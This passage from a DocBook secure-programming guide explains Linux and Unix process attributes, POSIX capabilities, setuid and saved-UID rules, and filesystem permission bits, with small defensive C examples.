to mean simply an expert or enthusiast, particularly regarding computers.
|
||
It is true that some hackers commit malicious or intrusive actions,
|
||
but many other hackers do not,
|
||
and it's unfair to claim that all hackers perform malicious activities.
|
||
Many other glossaries and books note that not all hackers are attackers.
|
||
For example,
|
||
the Industry Advisory Council's Information Assurance (IA)
|
||
Special Interest Group (SIG)'s
|
||
<ulink url="http://www.iaconline.org/sig_infoassure.html">
|
||
Information Assurance Glossary</ulink> defines hacker as
|
||
``A person who delights in having an intimate understanding of the
|
||
internal workings of computers and computer networks.
|
||
The term is misused in a negative context where `cracker' should be used.''
|
||
<ulink url="http://www.catb.org/~esr/jargon">The
|
||
Jargon File</ulink> has a
|
||
<ulink url="http://www.catb.org/~esr/jargon/html/entry/hacker.html">
|
||
long and complicated definition for hacker</ulink>, starting with
|
||
``A person who enjoys exploring the details of programmable systems
|
||
and how to stretch their capabilities,
|
||
as opposed to most users, who prefer to learn only the minimum necessary.'';
|
||
it notes that although some people use the term to mean
|
||
``A malicious meddler who tries to discover sensitive information
|
||
by poking around'', it also states that this definition is deprecated and
|
||
that the correct term for this sense is ``cracker''.
|
||
</para>
|
||
|
||
<!-- TRANSLATORS: FEEL FREE TO OMIT THE FOLLOWING PARAGRAPH
|
||
(OR PORTIONS OF IT) IF IT DOES NOT APPLY TO YOUR LANGUAGE. -->
|
||
<para>
|
||
This book uses the ``new'' or ``logical'' quoting system, instead
|
||
of the traditional American quoting system: quoted information
|
||
does not include any trailing punctuation if the punctuation
|
||
is not part of the material being quoted.
|
||
While this may cause a minor loss of typographical beauty, the traditional
|
||
American system causes extraneous characters to be placed inside the quotes.
|
||
These extraneous characters have
|
||
no effect on prose but can be disastrous in code or computer commands.
|
||
<!-- See http://www.catb.org/~esr/jargon/html/Hacker-Writing-Style.html -->
|
||
<!-- I distinguish between the terms privilege and permission in this book;
|
||
a process (subject) may acquire privileges, while an object has permissions. -->
|
||
I use standard American (not British) spelling; I've yet to meet an
|
||
English speaker on any continent who has trouble with this.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="features">
|
||
<title>Summary of Linux and Unix Security Features</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 2:11 (NIV)</attribution>
|
||
<para>
|
||
Discretion will protect you, and understanding will guard you.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Before discussing guidelines on how to use Linux or Unix security features,
|
||
it's useful to know what those features are from a programmer's viewpoint.
|
||
This section briefly describes those features that are widely available
|
||
on nearly all Unix-like systems.
|
||
However, note that there is considerable variation between
|
||
different versions of Unix-like systems, and
|
||
not all systems have the abilities described here.
|
||
This chapter also notes some extensions or features specific to Linux;
|
||
Linux distributions tend to be fairly similar to each other from the
|
||
point-of-view of programming for security, because they all use essentially
|
||
the same kernel and C library (and the GPL-based licenses encourage rapid
|
||
dissemination of any innovations).
|
||
It also notes some of the security-relevant differences between different
|
||
Unix implementations, but please note that this isn't an exhaustive list.
|
||
This chapter doesn't discuss issues such as implementations of
|
||
mandatory access control (MAC) which many Unix-like systems do not implement.
|
||
If you already know what
|
||
those features are, please feel free to skip this section.
|
||
</para>
|
||
|
||
<para>
|
||
Many programming guides skim briefly over the security-relevant portions
|
||
of Linux or Unix and skip important information.
|
||
In particular, they often discuss ``how to use'' something in general terms
|
||
but gloss over the security attributes that affect their use.
|
||
Conversely, there's a great deal of detailed information in
|
||
the manual pages about individual functions, but the manual pages
|
||
sometimes obscure key security issues with detailed discussions on how
|
||
to use each individual function.
|
||
This section tries to bridge that gap; it gives an overview of
|
||
the security mechanisms in Linux that are likely to be used
|
||
by a programmer, concentrating specifically on the security
|
||
ramifications.
|
||
This section has more depth than the typical programming guides, focusing
|
||
specifically on security-related matters, and points to references
|
||
where you can get more details.
|
||
</para>
|
||
|
||
<para>
|
||
First, the basics.
|
||
Linux and Unix are
|
||
fundamentally divided into two parts: the kernel and ``user space''.
|
||
Most programs execute in user space (on top of the kernel).
|
||
Linux supports the concept of ``kernel modules'', which is simply the
|
||
ability to dynamically load code into the kernel, but note that it
|
||
still has this fundamental division.
|
||
Some other systems (such as the HURD) are ``microkernel'' based systems; they
|
||
have a small kernel with more limited functionality, and a set of ``user''
|
||
programs that implement the lower-level functions traditionally implemented
|
||
by the kernel.
|
||
</para>
|
||
|
||
<para>
|
||
Some Unix-like systems have been extensively modified to support
|
||
strong security, in particular to support U.S. Department of Defense
|
||
requirements for Mandatory Access Control (level B1 or higher).
|
||
This version of this book doesn't cover these systems or issues;
|
||
I hope to expand to that in a future version.
|
||
More detailed information on some of them is available elsewhere, for
|
||
example, details on SGI's ``Trusted IRIX/B''
|
||
are available in NSA's
|
||
<ulink url="http://www.radium.ncsc.mil/tpep/library/fers/index.html">Final
|
||
Evaluation Reports (FERs)</ulink>.
|
||
<!-- ???: Mention trusted Unix-like systems, MAC, ACLs, Trusted Solaris -->
|
||
</para>
|
||
|
||
<para>
|
||
When users log in, their usernames are mapped to integers marking their
|
||
``UID'' (for ``user id'') and the ``GID''s (for ``group id'') that they
|
||
are a member of.
|
||
UID 0 is a special privileged user (role) traditionally called ``root'';
|
||
on most Unix-like systems (including Unix) root
|
||
can overrule most security checks and is used to administer the system.
|
||
On some Unix systems, GID 0 is also special and permits unrestricted access
|
||
to resources at the group level [Gay 2000, 228];
|
||
this isn't true on other systems (such as Linux), but even in those systems
|
||
group 0 is essentially all-powerful because so many special system files
|
||
are owned by group 0.
|
||
Processes are the only ``subjects'' in terms of security (that is, only
|
||
processes are active objects).
|
||
Processes can access various data objects, in particular filesystem
|
||
objects (FSOs), System V Interprocess Communication (IPC) objects, and
|
||
network ports.
|
||
Processes can also send signals.
|
||
Other security-relevant topics include quotas and limits, libraries,
|
||
auditing, and PAM.
|
||
The next few subsections detail this.
|
||
</para>
|
||
|
||
<sect1 id="processes">
|
||
<title>Processes</title>
|
||
|
||
<para>
|
||
In Unix-like systems,
|
||
user-level activities are implemented by running processes.
|
||
Most Unix systems support a ``thread'' as a separate concept;
|
||
threads share memory inside a process, and the system scheduler actually
|
||
schedules threads.
|
||
Linux does this differently (and in my opinion uses a better approach):
|
||
there is no essential difference between a thread and a process.
|
||
Instead, in Linux, when a process creates another process it can choose
|
||
what resources are shared (e.g., memory can be shared).
|
||
The Linux kernel then performs optimizations to get thread-level speeds;
|
||
see clone(2) for more information.
|
||
It's worth noting that the Linux kernel developers tend to use the
|
||
word ``task'', not ``thread'' or ``process'', but the external
|
||
documentation tends to use the word process
|
||
(so I'll use the term ``process'' here).
|
||
When programming a multi-threaded application,
|
||
it's usually better to use one of the standard
|
||
thread libraries that hide these differences.
|
||
Not only does this make threading more portable, but some libraries
|
||
provide an additional level of indirection, by implementing more than
|
||
one application-level thread as a single operating system thread;
|
||
this can provide some improved performance on some systems for
|
||
some applications.
|
||
</para>
|
||
|
||
<sect2 id="process-attributes">
|
||
<title>Process Attributes</title>
|
||
|
||
<para>
|
||
Here are typical attributes associated with each process in a
|
||
Unix-like system:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
RUID, RGID - real UID and GID
|
||
of the user on whose behalf the process is running
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
EUID, EGID - effective UID and GID
|
||
used for privilege checks (except for the filesystem)
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
SUID, SGID - Saved UID and GID;
|
||
used to support switching permissions ``on and off'' as discussed below.
|
||
Not all Unix-like systems support this, but the vast majority do
|
||
(including Linux and Solaris);
|
||
if you want to check if a given system implements this option in the
|
||
POSIX standard, you can use sysconf(3) to determine if
|
||
_POSIX_SAVED_IDS is in effect.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
supplemental groups - a list of groups (GIDs) in which this
|
||
user has membership.
|
||
In the original version 7 Unix, this didn't exist -
|
||
processes were only a member of one group at a time, and a special
|
||
command had to be executed to change that group.
|
||
BSD added support for a list of groups in each process,
|
||
which is more flexible, and
|
||
this addition is now widely implemented (including by Linux and Solaris).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
umask - a set of bits determining the default access control settings
|
||
when a new filesystem object is created; see umask(2).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
scheduling parameters - each process has a scheduling policy, and those
|
||
with the default policy SCHED_OTHER have the additional parameters
|
||
nice, priority, and counter. See sched_setscheduler(2) for more information.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
limits - per-process resource limits (see below).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
filesystem root - the process' idea of where the root filesystem
|
||
("/") begins; see chroot(2).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
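<para>
As a rough illustration of the common attributes listed above, the
following sketch prints a process' real and effective IDs, its umask,
its supplemental groups, and whether saved IDs are available.
The function names <function>read_umask</function> and
<function>print_process_ids</function> and the 64-entry group buffer are
choices made for this example only; they are not taken from any library.
</para>

```c
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Return the current umask without changing it. umask(2) can only be
 * read by setting it, so set a restrictive value and restore the old
 * one at once. This is not safe if other threads create files. */
mode_t read_umask(void)
{
    mode_t old = umask(077);
    umask(old);
    return old;
}

/* Print the identity-related attributes of the calling process. */
void print_process_ids(FILE *out)
{
    gid_t groups[64];   /* arbitrary size chosen for this sketch */
    int n = getgroups(64, groups);  /* -1 if there are more than 64 */

    fprintf(out, "RUID=%ld EUID=%ld RGID=%ld EGID=%ld\n",
            (long)getuid(), (long)geteuid(),
            (long)getgid(), (long)getegid());
    fprintf(out, "umask=%03o\n", (unsigned)read_umask());
    fprintf(out, "saved IDs supported: %s\n",
            sysconf(_SC_SAVED_IDS) > 0 ? "yes" : "no");
    for (int i = 0; i < n; i++)
        fprintf(out, "supplemental group: %ld\n", (long)groups[i]);
}
```

<para>
Calling <function>print_process_ids(stdout)</function> from a setuid
program is a quick way to see that the real and effective IDs differ.
</para>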
|
||
|
||
<para>
|
||
Here are less-common attributes associated with processes:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
FSUID, FSGID - UID and GID used for filesystem access checks;
|
||
this is usually equal to the EUID and EGID respectively.
|
||
This is a Linux-unique attribute.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
capabilities - POSIX capability information; there are actually three
|
||
sets of capabilities on a process: the effective, inheritable, and permitted
|
||
capabilities. See below for more information on POSIX capabilities.
|
||
Linux kernel version 2.2 and greater support this; some other Unix-like
|
||
systems do too, but it's not as widespread.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
In Linux,
|
||
if you really need to know exactly what attributes are associated
|
||
with each process, the most definitive source is the
|
||
Linux source code, in particular
|
||
<filename>/usr/include/linux/sched.h</filename>'s definition of task_struct.
|
||
</para>
|
||
|
||
<para>
|
||
The portable way to create new processes is to use the fork(2) call.
|
||
BSD introduced a variant called vfork(2) as an optimization technique.
|
||
The bottom line with vfork(2) is simple: <emphasis remap="it">don't</emphasis> use it if you
|
||
can avoid it.
|
||
See <xref linkend="avoid-vfork"> for more information.
|
||
</para>
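<para>
A minimal sketch of the portable fork(2) pattern follows.
The helper name <function>fork_and_wait</function> is invented for this
example; it forks a child that exits at once and returns the exit status
the parent observes, with only basic error handling.
</para>

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork a child that exits immediately with `code`, wait for it, and
 * return the exit status seen by the parent (or -1 on any failure). */
int fork_and_wait(int code)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;          /* fork failed */
    if (pid == 0)
        _exit(code);        /* child: exit without flushing stdio twice */
    if (waitpid(pid, &status, 0) != pid)
        return -1;          /* wait failed or was interrupted */
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

<para>
The child uses _exit(2) so that buffers inherited from the parent are not
written a second time.
</para>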
|
||
|
||
<para>
|
||
Linux supports the Linux-unique clone(2) call.
|
||
This call works like fork(2), but allows specification of which resources
|
||
should be shared (e.g., memory, file descriptors, etc.).
|
||
Various BSD systems implement an rfork() system call
|
||
(originally developed in Plan 9); it has different
|
||
semantics but the same general idea (it also creates a process with tighter
|
||
control over what is shared).
|
||
<!-- For more on a vulnerability in old versions of rfork
|
||
(setuid/setgid programs could be controlled), see
|
||
http://www.openbsd.org/advisories/rfork.txt -->
|
||
Portable programs shouldn't use these calls directly, if possible;
|
||
as noted earlier,
|
||
they should instead rely on threading libraries that use such
|
||
calls to implement threads.
|
||
</para>
|
||
|
||
<para>
|
||
This book is not a full tutorial on writing programs, so
|
||
I will skip widely-available information on handling processes.
|
||
You can see the documentation for wait(2), exit(2), and so on for more
|
||
information.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="posix-capabilities">
|
||
<title>POSIX Capabilities</title>
|
||
|
||
<para>
|
||
POSIX capabilities are sets of bits that permit splitting of the privileges
|
||
typically held by root into a larger set of more specific privileges.
|
||
POSIX capabilities are defined
|
||
by a draft IEEE standard; they're not unique to Linux but they're not
|
||
universally supported by other Unix-like systems either.
|
||
Linux kernel 2.0 did not support POSIX capabilities, while version 2.2
|
||
added support for POSIX capabilities to processes.
|
||
When Linux documentation (including this one)
|
||
says ``requires root privilege'', in nearly all cases it
|
||
really means ``requires a capability'' as documented in the capability
|
||
documentation.
|
||
If you need to know the specific capability required, look it up in the
|
||
capability documentation.
|
||
</para>
|
||
|
||
<para>
|
||
In Linux,
|
||
the eventual intent is to permit capabilities to be attached to files
|
||
in the filesystem; as of this writing, however, this is not yet supported.
|
||
There is support for transferring capabilities, but this is disabled
|
||
by default.
|
||
Linux version 2.2.11 added a feature that makes capabilities
|
||
more directly useful, called the ``capability bounding set''.
|
||
The capability bounding set is a list of capabilities
|
||
that are allowed to be held by any process on the system (otherwise,
|
||
only the special init process can hold it).
|
||
If a capability does not appear in the bounding set, it may not be
|
||
exercised by any process, no matter how privileged.
|
||
This feature can be used to, for example, disable kernel module loading.
|
||
A sample tool that takes advantage of this is LCAP at
|
||
<ulink
|
||
url="http://pweb.netcom.com/~spoon/lcap/">http://pweb.netcom.com/~spoon/lcap/</ulink>.
|
||
</para>
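<para>
The bounding set described above was a system-wide setting in the 2.2
kernels.
As an assumption about the reader's system that goes beyond what this
section covers, later Linux kernels (2.6.25 and newer) keep a bounding set
per thread and let a process query it with prctl(2).
Under that assumption, the following sketch checks whether the capability
needed to load kernel modules is still available; the function name
<function>module_loading_allowed</function> is made up for this example.
</para>

```c
#include <linux/capability.h>
#include <sys/prctl.h>

/* Returns 1 if CAP_SYS_MODULE is in the calling thread's bounding set,
 * 0 if it has been removed, and -1 if the kernel rejects the request
 * (for example, on a kernel without PR_CAPBSET_READ). */
int module_loading_allowed(void)
{
    return prctl(PR_CAPBSET_READ, CAP_SYS_MODULE, 0, 0, 0);
}
```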
|
||
|
||
<para>
|
||
More information about POSIX capabilities is available at
|
||
<ulink
|
||
url="ftp://linux.kernel.org/pub/linux/libs/security/linux-privs">ftp://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="process-creation">
|
||
<title>Process Creation and Manipulation</title>
|
||
|
||
<para>
|
||
Processes may be created using fork(2), the non-recommended vfork(2),
|
||
or the Linux-unique clone(2); all of these system calls duplicate the existing
|
||
process, creating two processes out of it.
|
||
A process can execute a different program by calling execve(2),
|
||
or various front-ends to it (for example, see exec(3), system(3), and popen(3)).
|
||
</para>
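<para>
The fork-then-execve sequence can be sketched as follows.
The helper <function>run_program</function> and the one-entry environment
it passes are assumptions made for illustration; a real program would
decide for itself which environment variables the new program should see.
</para>

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run the program at `path` with argument vector `argv` and a small,
 * fixed environment. Returns the program's exit status, 127 if it
 * could not be executed, or -1 on fork/wait failure. */
int run_program(const char *path, char *const argv[])
{
    /* Illustrative environment only; not a recommendation. */
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, envp);
        _exit(127);         /* reached only if execve(2) failed */
    }
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

<para>
Calling execve(2) directly with an absolute path avoids the extra shell
that system(3) and popen(3) place between the caller and the program.
</para>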
|
||
|
||
<para>
|
||
<!-- I've known about the scripting race condition since forever, but the
|
||
description here is vaguely derived from perlsec(1) -->
|
||
When a program is executed, and its file has its setuid or setgid bit set,
|
||
the process' EUID or EGID (respectively) is usually set to the file's value.
|
||
This functionality was the source of an old Unix security weakness
|
||
when used to support setuid or setgid scripts, due to a race condition.
|
||
Between the time the kernel opens the file to see which interpreter to run,
|
||
and when the (now-set-id) interpreter turns around and reopens
|
||
the file to interpret it, an attacker might change the file
|
||
(directly or via symbolic links).
|
||
</para>
|
||
|
||
<para>
|
||
Different Unix-like systems handle the security issue for setuid scripts
|
||
in different ways.
|
||
Some systems, such as Linux, completely ignore the setuid and setgid
|
||
bits when executing scripts, which is clearly a safe approach.
|
||
Most modern releases of SysVr4 and BSD 4.4 use a different approach to
|
||
avoid the kernel race condition.
|
||
On these systems, when the kernel passes
|
||
the name of the set-id script to open to the interpreter,
|
||
rather than using a pathname (which would permit the race condition)
|
||
it instead passes the filename /dev/fd/3. This is a special
|
||
file already opened on the script, so that there can be no
|
||
race condition for attackers to exploit.
|
||
Even on these systems I recommend against using setuid/setgid
shell scripts for secure programs, as discussed below.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
In some cases a process can affect the various UID and GID values; see
|
||
setuid(2), seteuid(2), setreuid(2), and the Linux-unique setfsuid(2).
|
||
In particular the saved user id (SUID) attribute
|
||
is there to permit trusted programs to temporarily switch UIDs.
|
||
Unix-like systems supporting the SUID use the following rules:
|
||
If the RUID is changed, or the EUID is set to a value not equal to the RUID,
|
||
the SUID is set to the new EUID.
|
||
Unprivileged users can set their EUID from their SUID,
|
||
the RUID to the EUID, and the EUID to the RUID.
|
||
<!-- ??? In FreeBSD, On execve(), the saved UID is reset to the EUID.
|
||
Source: "Advanced Unix Programming", Warren W. Gay, page 231. -->
|
||
</para>
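<para>
The temporary switch that the saved UID makes possible might look like
the sketch below.
It assumes a system with saved IDs on which seteuid(2) leaves the saved
UID untouched (as on Linux); the function names are invented for this
example.
</para>

```c
#include <sys/types.h>
#include <unistd.h>

/* Switch the effective UID to the real UID, remembering the old EUID
 * in *saved_euid. Returns 0 on success, -1 on failure. */
int drop_euid_temporarily(uid_t *saved_euid)
{
    *saved_euid = geteuid();
    if (seteuid(getuid()) != 0)
        return -1;
    /* Verify that the change actually took effect. */
    return geteuid() == getuid() ? 0 : -1;
}

/* Restore the effective UID recorded by drop_euid_temporarily(). */
int restore_euid(uid_t saved_euid)
{
    if (seteuid(saved_euid) != 0)
        return -1;
    return geteuid() == saved_euid ? 0 : -1;
}
```

<para>
In a program that is not setuid both calls are no-ops that succeed, since
the real, effective, and saved UIDs are already equal.
Because the old EUID remains reachable through the saved UID, this is
only a temporary drop; it does not protect against an attacker who can
run code inside the process.
</para>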
|
||
|
||
<para>
|
||
The Linux-unique
|
||
FSUID process attribute is intended to permit programs like the NFS server
|
||
to limit themselves to only the filesystem rights of some given UID
|
||
without giving that UID permission to send signals to the process.
|
||
Whenever the EUID is changed, the FSUID is changed to the new
|
||
EUID value; the FSUID value can be set separately using setfsuid(2), a
|
||
Linux-unique call.
|
||
Note that non-root callers can only set FSUID to the current
|
||
RUID, EUID, SUID, or current FSUID values.
|
||
</para>
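<para>
As a small Linux-only sketch, the current FSUID can be read back through
setfsuid(2) itself, because the call returns the previous FSUID whether or
not it succeeds.
The helper name <function>current_fsuid</function> is an assumption of
this example.
</para>

```c
#include <sys/fsuid.h>
#include <sys/types.h>
#include <unistd.h>

/* Return the caller's current FSUID. setfsuid(2) always returns the
 * previous FSUID, so passing an invalid UID (-1) queries the value
 * without changing it. */
uid_t current_fsuid(void)
{
    return (uid_t)setfsuid((uid_t)-1);
}
```

<para>
Unless the program has called setfsuid(2) with a different value, the
result should equal geteuid().
</para>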
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="files">
|
||
<title>Files</title>
|
||
|
||
<para>
|
||
On all Unix-like systems, the primary repository of information is
|
||
the file tree, rooted at ``/''.
|
||
The file tree is a hierarchical set of directories, each of which
|
||
may contain filesystem objects (FSOs).
|
||
</para>
|
||
|
||
<para>
|
||
In Linux,
|
||
filesystem objects (FSOs) may be ordinary files, directories,
|
||
symbolic links, named pipes (also called first-in first-outs or FIFOs),
|
||
sockets (see below),
|
||
character special (device) files, or block special (device) files
|
||
(in Linux, this list is given in the find(1) command).
|
||
Other Unix-like systems have an identical or similar list of FSO types.
|
||
</para>
|
||
|
||
<para>
|
||
Filesystem objects are collected on filesystems, which can be
|
||
mounted and unmounted on directories in the file tree.
|
||
A filesystem type (e.g., ext2 and FAT) is a specific set of conventions
|
||
for arranging data on the disk to optimize speed, reliability, and so on;
|
||
many people use the term ``filesystem'' as a synonym for the filesystem type.
|
||
</para>
|
||
|
||
<sect2 id="fso-attributes">
|
||
<title>Filesystem Object Attributes</title>
|
||
|
||
<para>
|
||
Different Unix-like systems support different filesystem types.
|
||
Filesystems may have slightly different sets of access control attributes
|
||
and access controls can be affected by options selected at mount time.
|
||
On Linux, the ext2 filesystem is currently the most popular filesystem,
|
||
but Linux supports a vast number of filesystems.
|
||
Most Unix-like systems tend to support multiple filesystems too.
|
||
</para>
|
||
|
||
<para>
|
||
Most filesystems on Unix-like systems store at least the following:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
owning UID and GID - identifies the ``owner'' of the filesystem
|
||
object. Only the owner or root can change the access control attributes
|
||
unless otherwise noted.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
permission bits -
|
||
read, write, execute bits for each of user (owner), group, and other.
|
||
For ordinary files, read, write, and execute have their typical meanings.
|
||
In directories, the ``read'' permission is necessary to display a directory's
|
||
contents, while the ``execute'' permission is sometimes called ``search''
|
||
permission and is necessary to actually enter the directory to use its contents.
|
||
``Write'' permission on a directory permits
|
||
adding, removing, and renaming files in that directory; if you want users
to be able to add files without removing or renaming files owned by others, set the sticky bit noted below.
|
||
Note that the permission values of symbolic links are never used; it's only
|
||
the values of their containing directories and the linked-to file that matter.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
``sticky'' bit - when set on a directory, unlinks (removes) and
|
||
renames of files in that directory are limited to
|
||
the file owner, the directory owner, or root privileges.
|
||
This is a very common Unix extension
|
||
and is specified in the
|
||
Open Group's Single Unix Specification version 2.
|
||
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/chmod.html -->
|
||
Old versions of Unix called this the ``save program text'' bit and used this
|
||
to indicate executable files that should stay in memory.
|
||
Systems that did this ensured that only root could set this bit
|
||
(otherwise users could have crashed systems by forcing ``everything''
|
||
into memory).
|
||
In Linux, this bit has no effect on ordinary files and ordinary users
|
||
can modify this bit on the files they own:
|
||
Linux's virtual memory management makes this old use irrelevant.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
setuid, setgid - when set on an executable file,
|
||
executing the file will set the process' effective UID or effective GID
|
||
to the value of the file's owning UID or GID (respectively).
|
||
All Unix-like systems support this.
|
||
In Linux and System V systems,
|
||
when setgid is set on a file that does not have any execute privileges,
|
||
this indicates a file that is subject to mandatory locking
|
||
during access (if the filesystem is mounted to support mandatory locking);
|
||
this overload of meaning surprises many and is not universal across Unix-like
|
||
systems.
|
||
In fact, the Open Group's Single Unix Specification version 2 for chmod(3)
|
||
permits systems to ignore
|
||
requests to turn on setgid for files that aren't executable if such
|
||
a setting has no meaning.
|
||
In Linux and Solaris,
|
||
when setgid is set on a directory, files created in the directory will
|
||
have their GID automatically reset to that of the directory's GID.
|
||
The purpose of this approach is to support ``project directories'':
|
||
users can save files into such specially-set directories and the group
|
||
owner automatically changes.
|
||
However, setting the setgid bit on directories is not specified by
|
||
standards such as the Single Unix Specification
|
||
[Open Group 1997].
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
timestamps - access and modification times are stored for each
|
||
filesystem object. However, the owner is allowed to set these values
|
||
arbitrarily (see touch(1)), so be careful about trusting this information.
|
||
All Unix-like systems support this.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
The following attributes are Linux-unique extensions on the ext2
|
||
filesystem, though many other filesystems have similar functionality:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
immutable bit - no changes to the filesystem object are allowed;
|
||
only root can set or clear this bit.
|
||
This is only supported by ext2 and is not portable across all Unix
|
||
systems (or even all Linux filesystems).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
append-only bit - only appending to the filesystem object is allowed;
|
||
only root can set or clear this bit.
|
||
This is only supported by ext2 and is not portable across all Unix
|
||
systems (or even all Linux filesystems).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Other common extensions include some sort of bit indicating ``cannot
|
||
delete this file''.
|
||
</para>
|
||
|
||
<para>
|
||
Many of these values can be influenced at mount time, so that, for example,
|
||
certain bits can be treated as though they had a certain value (regardless
|
||
of their values on the media).
|
||
See mount(1) for more information about this.
|
||
These bits are useful, but be aware that some of these are intended to
|
||
simplify ease-of-use and aren't really sufficient to prevent certain actions.
|
||
For example, on Linux, mounting with ``noexec'' will disable execution of
|
||
programs on that file system; as noted in the manual, it's
|
||
intended for mounting filesystems containing binaries for incompatible systems.
|
||
On Linux,
|
||
this option won't completely prevent someone from running the files;
|
||
they can copy the files somewhere else to run them, or even use the
|
||
command ``/lib/ld-linux.so.2'' to run the file directly.
|
||
</para>
|
||
|
||
<para>
|
||
Some filesystems don't support some of these access control values; again,
|
||
see mount(1) for how these filesystems are handled.
|
||
In particular, many Unix-like systems support MS-DOS disks, which by
|
||
default support very few of these attributes (and there's no standard
|
||
way to define these attributes).
|
||
In that case, Unix-like systems emulate the standard attributes
|
||
(possibly implementing them through special on-disk files), and these
|
||
attributes are generally influenced by the mount(1) command.
|
||
</para>
|
||
|
||
<para>
|
||
It's important to note that, for adding and removing files, only the
|
||
permission bits and owner of the file's <emphasis>directory</emphasis>
|
||
really matter unless the Unix-like system supports
|
||
more complex schemes (such as POSIX ACLs).
|
||
Unless the system has other extensions, and stock Linux 2.2 doesn't,
|
||
a file that has no permissions in its permission bits
|
||
can still be removed if its containing directory permits it.
|
||
Also, if an ancestor directory permits its children to be changed by some
|
||
user or group, then any of that directory's descendants can be replaced by
|
||
that user or group.
|
||
</para>
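<para>
The point about removal can be checked with a short experiment.
The following C sketch, which assumes a writable /tmp and uses the
hypothetical function name remove_mode0_file(), creates a file, strips
all of its permission bits, and then removes it anyway, because the
containing directory permits the removal.
<programlisting width="61">
<![CDATA[
```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical demo: returns 0 if a file with no
   permission bits could still be removed, else -1.
   Assumes /tmp exists and is writable. */
int remove_mode0_file(void)
{
    char dir[] = "/tmp/fso-demo-XXXXXX";
    char path[64];
    int fd, rc = -1;

    if (mkdtemp(dir) == NULL)   /* private dir, mode 0700 */
        return -1;
    snprintf(path, sizeof(path), "%s/locked", dir);

    fd = open(path, O_CREAT | O_EXCL | O_WRONLY, 0600);
    if (fd >= 0) {
        close(fd);
        if (chmod(path, 0) == 0)   /* mode is now 0000 */
            rc = unlink(path);     /* directory decides */
        else
            unlink(path);
    }
    rmdir(dir);
    return rc;
}
```
]]>
</programlisting>
</para>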
|
||
|
||
<para>
|
||
The draft IEEE POSIX standard on security defines a technique for
|
||
true ACLs that support a list of users and groups with their permissions.
|
||
Unfortunately, this is not widely supported nor supported exactly the
|
||
same way across Unix-like systems.
|
||
Stock Linux 2.2, for example, has neither ACLs nor POSIX capability
|
||
values in the filesystem.
|
||
</para>
|
||
|
||
<para>
|
||
It's worth noting that the Linux ext2
|
||
filesystem by default reserves a small amount of space for the root user.
|
||
This is a partial defense against denial-of-service attacks; even if a user
|
||
fills a disk that is shared with the root user, the root user has a little
|
||
space left over (e.g., for critical functions).
|
||
The default is 5% of the filesystem space; see mke2fs(8),
|
||
in particular its ``-m'' option.
|
||
</para>
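<para>
A program can observe this reservation through statvfs(3), which reports
both the total number of free blocks (f_bfree) and the number of free blocks
available to unprivileged processes (f_bavail).
The sketch below is illustrative only; reserved_blocks() is a hypothetical
helper name, and on filesystems that reserve nothing the result is simply zero.
<programlisting width="61">
<![CDATA[
```c
#include <sys/statvfs.h>

/* Hypothetical helper: store in *reserved the number of
   free blocks that only privileged processes may use.
   Returns 0 on success, -1 if statvfs(3) fails. */
int reserved_blocks(const char *path,
                    unsigned long long *reserved)
{
    struct statvfs vfs;

    if (statvfs(path, &vfs) != 0)
        return -1;
    /* f_bfree counts all free blocks; f_bavail only those
       an unprivileged process may allocate. */
    *reserved = (vfs.f_bfree > vfs.f_bavail)
        ? (unsigned long long)(vfs.f_bfree - vfs.f_bavail)
        : 0ULL;
    return 0;
}
```
]]>
</programlisting>
</para>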
|
||
